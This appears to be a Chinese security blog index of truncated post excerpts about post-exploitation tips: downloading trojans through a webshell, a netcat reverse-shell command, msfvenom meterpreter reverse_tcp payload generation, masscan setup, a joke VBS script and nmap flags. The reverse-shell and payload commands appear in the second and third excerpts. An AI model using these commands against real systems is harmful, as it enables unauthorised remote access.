有时候通过webshell会遇到无法上传马的现象，那么，可以试试通过shell创建个文件，然后后缀名为vbs，通过vbs脚本下载远程木马。下载后，通过webshell的命令执行尝试。代码如下：————————————————————————- 或者新建vbs脚本如下： 或者使用powershell下载 或者使用bitsadmin.exe 或者使用certutil 或者使用js下载

查看全部

Cmd路径：c:\windows\temp\cmd.exe Nc 也在同目录下，例如反弹cmdshell： “c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”通常都不会成功。 而直接在 cmd 路径上输入：c:\windows\temp\nc.exe 命令输入：-vv ip 999 -e c:\windows\temp\cmd.exe 却能成功。这个不是重点 我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

查看全部

List payloads msfvenom -l Binaries Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=&lt […]

查看全部

安装配置 在Debian/Ubuntu系统中，安装方法如下： $ sudo apt-get install git gcc make libpcap-dev $ git clone https://github.com/robertdavidgraham/masscan $ cd masscan $ make 注:安装完成后的可执行程序在masscan/bin中 您也可以使用多线程加快编译速度 make -j PF_RING 如果您想获得超过两百万每秒的速度，您需要一个英特尔10-Gbps网卡和一个被称为PF_RING DNA(http://www.ntop.org/products/pf_ring/)的特殊驱动程序。masscan使用PF_RING不要进行重建，你只需要建立以下组件即可: libpfring.so (安装于 /usr/lib/libpfring.so) pf_ring.k […]

查看全部

无聊写了一段代码.VBS的.纯出无聊，写着玩意…. 只希望快点从某些难过的情绪里走出来…. 分割线以下的代码直接复制到文本中(文本?就是TXT格式的文件啊),保存,再然后把文本的后缀名txt改成VBS，你自己双击打开试试. ——————————————————– Dim a,b If msgbox(“你喜欢我嘛?”,VByesno,”o(∩_∩)o “)=vbyes then msgbox”o(∩_∩)o ~看到这样的结果好开心!”,0,”o(∩_∩)o &# […]

查看全部

主机发现 -iL filename                             从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段 -iR hostnum                            随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描 –exclude host1[, host2]        从扫描任务中需要排除的主机 –exculdefile exclude_file      排除文件中的IP,格式和-iL指定扫描文件的格式相同 -sL                                               仅仅是显示,扫描的IP数目,不会进行任何扫描 -sn                                               ping扫描,即主机发现 -Pn […]

查看全部